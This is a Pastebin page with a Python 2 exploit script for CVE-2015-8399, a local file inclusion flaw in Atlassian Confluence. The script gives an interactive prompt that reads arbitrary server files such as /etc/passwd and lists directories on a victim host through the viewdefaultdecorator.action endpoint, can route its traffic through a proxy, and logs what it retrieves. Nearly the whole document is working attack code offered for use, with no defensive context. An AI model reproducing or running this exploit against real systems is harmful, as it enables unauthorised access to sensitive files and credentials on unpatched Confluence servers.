Guest User

Untitled

a guest
Feb 26th, 2017
217
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3.  
  4. # Exploit Title: Atlassian Confluence LFI Exploit
  5. # Date: 05-11-2016
  6. # Exploit Author: Alexander Gurin
  7. # Vendor Homepage: https://www.atlassian.com/software/confluence
  8. # Software Link: https://www.atlassian.com/software/confluence/download
  9. # Version: 5.2, 5.8.14, 5.8.15
  10. # Tested on: Linux (Debian, CentOS), Windows 2008R2
  11. # CVE : CVE-2015-8399
  12.  
  13. import sys, os, hashlib, base64, requests, socks, codecs
  14. import readline
  15. from pprint import pprint
  16. from datetime import datetime
  17. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  18. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  19.  
  20. ### Target  settings
  21. victim = 'http://victim.org/' ### Set victim host
  22.  
  23. ### Proxy settings
  24.  
  25. HTTP_PROXY_ENABLED = 0 # If need to activate, set 1
  26. proxies = {'http': 'http://login:password@host:port/', 'https': 'https://login:password@host:port/'} ### HTTP-proxy
  27.  
  28. ### Set headers
  29.  
  30. s = requests.Session()
  31. s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'})
  32. s.headers.update({'Content-Type':'application/x-www-form-urlencoded'})
  33. s.headers.update({'X-Requested-With':'XMLHttpRequest'})
  34. s.verify= False
  35.  
  36. ### Logging all output commands
  37.  
  38. LOGFILE = os.path.realpath(os.path.dirname(__file__ )) + '/log_' + datetime.strftime(datetime.now(), "%d_%m_%Y") + '.txt'
  39.  
  40. print ' \033[96m[!]\033[0m For getting file, read_file$/etc/passwd'
  41. print ' \033[96m[!]\033[0m For directory listening, read_file$/etc'
  42.  
  43. def get_my_ip():
  44.     while True:
  45.         try:
  46.             r = s.get('https://api.ipify.org')
  47.             if r:
  48.                 if r.status_code == 200:
  49.                     return r.text
  50.         except requests.ConnectionError:
  51.             print ' [-] ConnectionError'
  52.             time.sleep(20)         
  53.  
  54. if HTTP_PROXY_ENABLED == 1:
  55.     s.proxies = proxies
  56.     print ' \033[96m[+]\033[0m Proxy server activated: ' + get_my_ip()
  57.  
  58. def loger(cmd, data):
  59.     f = codecs.open(LOGFILE, encoding='utf-8', mode='a')
  60.     f.write('read_file$ %s\n%s\n' % (cmd, data))
  61.     f.close()
  62.  
  63. def reader(url):   
  64.     ans = s.get(''+ victim +'spaces/viewdefaultdecorator.action?decoratorName=file://' + url + '').content
  65.     start_tag = ans.find("<code>")
  66.     end_tag = ans.rfind("</code>")
  67.     data = ans[start_tag + 6    : end_tag ]
  68.     return data
  69.  
  70. def main():
  71.     while 1:
  72.         path = raw_input('\033[96mread_file$ \033[0m')
  73.         url = "+ path +"
  74.         ans = s.get(''+ victim +'spaces/viewdefaultdecorator.action?decoratorName=file://' + url + '').content
  75.         ans = reader(path).replace("<br/>", "\n")
  76.         print ans
  77.         loger(path, ans)
  78.         if path == "quit" : break
  79.         if path == "" : print "Not found!"
  80.  
  81. if __name__ == '__main__':
  82.     try:
  83.         try:
  84.             main()
  85.         except KeyboardInterrupt:
  86.             sys.exc_clear()
  87.         print 'Goodbye! =)'
  88.     except Exception:
  89.         pass
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×